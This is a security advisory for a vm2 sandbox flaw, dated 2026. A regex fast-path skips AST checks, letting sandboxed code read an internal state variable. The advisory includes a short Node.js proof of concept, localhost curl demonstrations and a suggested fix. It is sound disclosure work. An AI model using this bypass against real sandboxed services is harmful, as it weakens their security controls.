CVE-2026-44003

MEDIUM5.3EPSS 0.05%

vm2's Transformer Fast-Path Bypass Exposes Internal State Variable

Published: 5/7/2026Modified: 5/14/2026

Description

### Summary vm2's code transformer has a performance optimization that skips AST analysis when the code does not contain `catch`, `import`, or `async` keywords. This fast-path bypass allows sandboxed code to directly access the internal `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL` variable, which exposes internal security functions (`handleException`, `wrapWith`, `import`). ### Details In `lib/transformer.js:55-57`, a regex check `/\b(?:catch|import|async)\b/` determines whether AST transformation is needed. If the code does not contain any of these keywords, the transformer returns the code unmodified. When the fast-path is taken: 1. **INTERNAL_STATE_NAME identifier check is bypassed**: The AST visitor that blocks access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL` never runs 2. **`with` statement instrumentation is bypassed**: `with()` statements are not wrapped with `wrapWith()`, enabling scope manipulation 3. The internal state object exposes: `handleException(e)`, `wrapWith(x)`, `import(what)` While these methods are currently defensive utilities (not direct escape vectors), this represents a complete bypass of a security control. Any future addition of a sensitive method to the internal state object would be immediately exploitable. ### PoC **Library-level PoC (Node.js script — primary):** ```javascript const { VM } = require("vm2"); const vm = new VM(); // Access internal state (bypassed — no catch/import/async keywords) const result = vm.run(` var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; Object.keys(x).join(",") `); console.log(result); // "wrapWith,handleException,import" // Control test — blocked when catch keyword is present try { vm.run(` try { var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; } catch(e) { e.message } `); } catch(e) { console.log(e.message); // "Use of internal vm2 state variable" } ``` **HTTP demonstration:** ```bash # Internal state access (bypassed) curl -s -X POST http://localhost:3000/api/execute \ -H "Content-Type: application/json" \ -d '{"code":"var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; Object.keys(x).join(\",\")"}' # Result: "wrapWith,handleException,import" # Control test — blocked when catch keyword is present curl -s -X POST http://localhost:3000/api/execute \ -H "Content-Type: application/json" \ -d '{"code":"try { var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; } catch(e) { e.message }"}' # Result: {"errors":["Use of internal vm2 state variable"]} ``` **Suggested fix:** ```javascript // transformer.js:55 — add 'with' keyword and INTERNAL_STATE_NAME check if (!/\b(?:catch|import|async|with)\b/.test(code) && code.indexOf(INTERNAL_STATE_NAME) === -1) { return {__proto__: null, code, hasAsync: false}; } ``` ### Impact - **Security Control Bypass**: The INTERNAL_STATE_NAME access restriction is completely ineffective when the code avoids 3 specific keywords. - **Defense-in-Depth Violation**: Internal security functions are exposed, creating a latent attack surface for future code changes. - **Scope**: All applications using vm2. No special configuration required.

Affected packages (1)

npm/vm2from 0, < 3.11.0

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	MEDIUM5.3	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Description

Affected packages (1)

CVSS scores

References (4)